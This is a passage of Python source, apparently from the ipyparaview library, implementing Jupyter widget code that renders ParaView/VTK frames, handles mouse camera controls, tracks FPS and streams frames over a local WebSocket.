self.fpsOut = [] # FPS output ipywidgets; passed in from Jupyter
self.intyld = [0.05, 0.01] # interaction yield--period and duration
self.tiy = time.time() # time of last interaction yield
if self.mode == "Dask":
self.renderers = ren
self.master = [r for r in self.renderers if r.rank == 0][0]
self.resolution = tuple(
self.master.run(lambda self: list(self.renv.ViewSize), []).result()
)
cf = self.master.run(
lambda self: list(self.renv.CameraFocalPoint), []
).result()
cp = self.master.run(
lambda self: list(self.renv.CameraPosition), []
).result()
self.camf = (cf[0], cf[1], cf[2])
self.camp = (cp[0], cp[1], cp[2])
else:
import paraview.simple as pvs
self.pvs = pvs
self.renv = ren
self.resolution = tuple(self.renv.ViewSize)
cf = self.renv.CameraFocalPoint
cp = self.renv.CameraPosition
self.camf = (cf[0], cf[1], cf[2])
self.camp = (cp[0], cp[1], cp[2])
import vtk
from vtk import vtkWindowToImageFilter
self.w2i = vtkWindowToImageFilter()
self.w2i.ReadFrontBufferOff()
self.w2i.ShouldRerenderOff()
self.w2i.SetInput(self.renv.SMProxy.GetRenderWindow())
self.frameNum = 0
self.FRBufSz = 10
self.FRBuf = np.zeros(self.FRBufSz, dtype=np.float32)
self.runAsync = runAsync
if runAsync:
self.renderThread = threading.Thread(target=self.__renderLoop)
self.renderThread.start()
# FIXME: starting the render loop thread outside of __init__ seems to create
# a copy of the paraview.simple object, rather than using the one that's
# part of the PVDisplay state; this causes PV to crash
# def setAsync(self, on):
# if on and not self.runAsync:
# self.runAsync = on
# self.renderThread = threading.Thread(target=self.__renderLoop)
# self.renderThread.start()
# elif not on and self.runAsync:
# self.runAsync = False
def addFPSDisplay(self, *w):
"""Add a widget to write FPS to"""
for o in w:
self.fpsOut.append(o)
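    # Usage sketch (hedged, hypothetical names): pass one or more ipywidgets value
    # widgets; their .value is updated with the measured FPS on each rendered frame, e.g.
    #   fps_box = widgets.FloatText(description="FPS")
    #   display(fps_box)
    #   pvdisp.addFPSDisplay(fps_box)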
def updateCam(self):
self.render()
def render(self):
if self.runAsync:
return
else:
tc = time.time()
            # equivalent to 1.0 / (tc - self.tp) < self.fpsLimit, but safe when tc == self.tp
            if (tc - self.tp) > 1.0 / self.fpsLimit:
self.__renderFrame()
def fetchFrame(self):
if self.mode == "Dask":
return self.master.fetchFrame().result()
else:
# Mathias's magic frame fetching snippet
self.w2i.Modified()
self.w2i.Update()
imagedata = self.w2i.GetOutput()
w, h, _ = imagedata.GetDimensions()
from vtk.util.numpy_support import vtk_to_numpy
imagedata_np = vtk_to_numpy(imagedata.GetPointData().GetScalars()).reshape(
(h, w, 3)
)
return np.flipud(
np.pad(
imagedata_np,
((0, 0), (0, 0), (0, 1)),
mode="constant",
constant_values=255,
)
)
def _handle_custom_msg(self, content, buffers):
self.content = content
if content["event"] == "updateCam":
self.updateCam()
if content["event"] == "rotate":
self.__rotateCam(content["data"])
if content["event"] == "pan":
self.__panCam(content["data"])
if content["event"] == "zoom":
self.__zoomCam(content["data"])
def __rotateCam(self, mouseDelta):
# rotates the camera around the focus in spherical
phiLim = 1.5175
if self.mode == "Dask":
from dask.distributed import wait
wait(
[
r.rotateCam(mouseDelta, self.rotateScale, phiLim)
for r in self.renderers
]
)
else:
(
self.renv.CameraPosition,
self.renv.CameraFocalPoint,
self.renv.CameraViewUp,
) = rotateCameraTurntable(
mouseDelta,
self.renv.CameraPosition,
self.renv.CameraFocalPoint,
self.renv.CameraViewUp,
self.rotateScale,
phiLim,
)
self.render()
def __panCam(self, mouseDelta):
# moves the camera with a 1:1 relation to current focal point
if self.mode == "Dask":
from dask.distributed import wait
wait([r.panCam(mouseDelta) for r in self.renderers])
else:
(
self.renv.CameraPosition,
self.renv.CameraFocalPoint,
self.renv.CameraViewUp,
) = panCameraTurntable(
mouseDelta,
self.renv.CameraPosition,
self.renv.CameraFocalPoint,
self.renv.CameraViewUp,
self.renv.CameraViewAngle,
)
self.render()
def __zoomCam(self, mouseDelta):
# zooms by scaling the distance between camera and focus
rlim = 0.00001 # minimum allowable radius
d = (1.0 + self.zoomScale) ** mouseDelta
if self.mode == "Dask":
from dask.distributed import wait
wait([r.zoomCam(d, rlim) for r in self.renderers])
else:
(
self.renv.CameraPosition,
self.renv.CameraFocalPoint,
self.renv.CameraViewUp,
) = zoomCameraTurntable(
d,
self.renv.CameraPosition,
self.renv.CameraFocalPoint,
self.renv.CameraViewUp,
rlim,
)
self.render()
def __compressFrame(self, frame):
img = Image.fromarray(frame[:, :, :3])
bytesIO = BytesIO()
img.save(bytesIO, format="jpeg", quality=50)
img_str = base64.b64encode(bytesIO.getvalue())
return img_str
def __renderFrame(self):
tc = time.time()
self.FRBuf[self.frameNum % self.FRBufSz] = 1.0 / (tc - self.tp)
self.tp = tc
# set the camera position, render, and get the output frame
if self.mode == "Dask":
from dask.distributed import wait
wait([r.render() for r in self.renderers])
else:
self.pvs.Render(view=self.renv)
uncompressedFrameNp = self.fetchFrame()
if self.compressFrames:
self.compressedFrame = self.__compressFrame(uncompressedFrameNp)
else:
            self.frame = uncompressedFrameNp.tobytes()  # tostring() is deprecated/removed in newer NumPy
self.frameNum += 1
self.fps = np.average(self.FRBuf)
if self.fpsOut is not None:
for fo in self.fpsOut:
fo.value = self.fps
def __renderLoop(self):
while self.runAsync:
# check if it's time for an interaction yield; if so, do it
if time.time() - self.tiy > self.intyld[0]:
time.sleep(self.intyld[1])
self.tiy = time.time()
# sleep to keep FPS to fpsLimit
time.sleep(max(0, 1.0 / self.fpsLimit - (time.time() - self.tp)))
self.__renderFrame()
@widgets.register
class VStream(widgets.DOMWidget):
"""A WebSocket-based video stream widget with interaction."""
_view_name = Unicode("VStreamView").tag(sync=True)
_model_name = Unicode("VStreamModel").tag(sync=True)
_view_module = Unicode("ipyparaview").tag(sync=True)
_model_module = Unicode("ipyparaview").tag(sync=True)
_view_module_version = Unicode("^0.1.2").tag(sync=True)
_model_module_version = Unicode("^0.1.2").tag(sync=True)
url = Unicode("ws://localhost:9002").tag(sync=True)
state = Unicode("").tag(sync=True)
def connect(self):
self.state = "connect"
|